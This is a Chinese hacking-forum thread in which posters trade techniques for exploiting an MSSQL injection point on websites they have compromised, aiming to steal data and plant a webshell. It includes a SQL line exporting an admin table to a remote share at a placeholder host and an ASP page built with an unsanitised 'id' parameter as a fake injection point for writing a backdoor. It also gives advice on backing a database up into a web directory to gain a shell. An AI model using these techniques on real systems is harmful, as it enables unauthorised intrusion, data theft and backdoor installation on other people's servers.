议题作者：混世魔王
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

一个DBO的MSSQL主入点。搞不到绝对路径。可以跨库。可以查询。怎么导出字段？

ACC 记载
SELECT * into [test.txt] in '\\yourip\share' 'text;' from admin

我也有这个问题！
[求助]如何在查询分析器写语句列目录并保存到表？
最近拿了个站发现其他分站数据库和网站文件都是打乱放的！
例如 A站网页文件和c站的数据库在1服务器
而   c站网页文件和e站的数据库在2服务器
现在得到了 目标分站的数据库帐号密码！
首先当然考虑 伪造注入点 备份马儿！

但无奈按照fierfox老大提供的
<%
strSQLServerName = "192.168.1.14"    &#39;服务器名称或地址
strSQLDBUserName = "xxxxxx"      &#39;数据库帐号
strSQLDBPassword = "xx"      &#39;数据库密码
strSQLDBName = "sver"        &#39;数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
    conn.open strCon
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from game_admin where id="&id:rs.open strSQL,conn,1,3
rs.close
%>
进行注入,打开页面时提示
Microsoft OLE DB Provider for SQL Server 错误 &#39;80040e14&#39;
第 1 行: &#39;=&#39; 附近有语法错误。
/222.asp，行 12

不知道的那里出错...
id这个值是有的也有纪录在！

现在只好靠手工列目录，在百度找了很久都没关于使用mssql数据库读取目录并保存到表的资料！
来这里希望高手指教下，或者知道上面是那里出错的也请指出！

你说的问题和我现在的情况基本一样，但我不要求导出字段，因为没有物理路径，生成不了shell，不知道下一步怎么办。

我进到后台了，但是后台完全没办法利用，不能改包，没有备份，没有恢复，SQL的库。

有sql账号和密码的话，用存储过程来列表。。。

1.要先确认绝对路径

2.有MSSQL帐户或者是注入点

3.最好存储过程存在!

引用:

引用第5楼anki于2007-08-09 09:01发表的 :
1.要先确认绝对路径

2.有MSSQL帐户或者是注入点

3.最好存储过程存在!

1.要先确认绝对路径    //可以暴出旁站的物理路径，但猜不出目标站的。

2.有MSSQL帐户或者是注入点  //有DBO注入点 可以列跨库名称，但不能跨库查询

3.最好存储过程存在![/quote]   //没有执行权限，所有IE提交均无反馈。

引用:

引用第0楼混世魔王于2006-12-13 10:13发表的 [讨论]一个DBO的MSSQL主入点。搞不到绝对路径。可以跨库。可以查询。怎么导出数据 :
议题作者：混世魔王
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

一个DBO的MSSQL主入点。搞不到绝对路径。可以跨库。可以查询。怎么导出字段？

.......

搞不到路径，导出的数据放哪里？你的目的是想导出数据到web站目录，从而得webshell？还是只想要数据库中的数据？

我已经有数据库数据了，就想拿个webshell，一直没有好的办法。

开了1433没？

开了的话直接用MSSQL的企业管器连上去~然后直接备份数据库。它会提示你保存的路径。其实就是可以浏览物理路径了。然后用那啥查询分析器直接连上去BACK到你想要的目录就OK了。